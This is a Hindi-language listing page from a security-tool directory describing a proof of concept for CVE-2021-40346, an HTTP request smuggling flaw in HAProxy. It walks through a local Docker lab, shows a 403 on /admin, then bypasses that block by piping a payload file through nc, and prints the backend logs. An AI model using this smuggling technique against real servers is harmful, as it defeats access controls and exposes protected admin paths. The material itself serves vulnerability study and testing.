Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-40346 — CVE-2021-40346 PoC (HAProxy HTTP स्मगलिंग) | Kitploit
उपकरण/GitHubGitHub/knqyf263/cve-2021-40346
भेद्यता विश्लेषणशोषणआईडीएस/आईपीएस से बचनावेब एप्लिकेशन शोषणWAF बाईपासलर्निंग और शिक्षा
GitHubknqyf263/cve-2021-40346

CVE-2021-40346

CVE-2021-40346 PoC (HAProxy HTTP स्मगलिंग)

रिपॉजिटरी देखें
4115115 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-40346

CVE-2021-40346 PoC (HAProxy HTTP Smuggling)

केवल शैक्षिक उद्देश्यों के लिए

सेटअप

$ docker build -t cve-2021-40346 .
$ docker run --name poc -p 8000:80 -d --rm -it cve-2021-40346
4941e9f23508b497e4cbe334a75e7cdb84c83478522ed85f48db3477f97a6fb4

टेस्ट

पुष्टि करें कि /admin अस्वीकृत है।

$ curl http://localhost:8000
hello
$ curl http://localhost:8000/admin
<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

आपको लॉग में /admin नहीं दिखेगा। इसका मतलब है कि अनुरोध बैकएंड सर्वर तक नहीं पहुंचा क्योंकि HAProxy ने इसे अस्वीकार कर दिया।

$ docker logs poc
server start at port 8000
/

फिर, आप यह सुनिश्चित कर सकते हैं कि payload.txt द्वारा इसे बाइपास किया जा सकता है।

$ cat payload.txt | nc localhost 8000
HTTP/1.1 200 OK
content-type: text/plain
date: Wed, 08 Sep 2021 22:31:10 GMT
keep-alive: timeout=5
transfer-encoding: chunked

6
hello

0

आपको लॉग में /admin मिलेगा।

$ docker logs poc
server start at port 8000
/
/
/admin
टूल डाउनलोड करें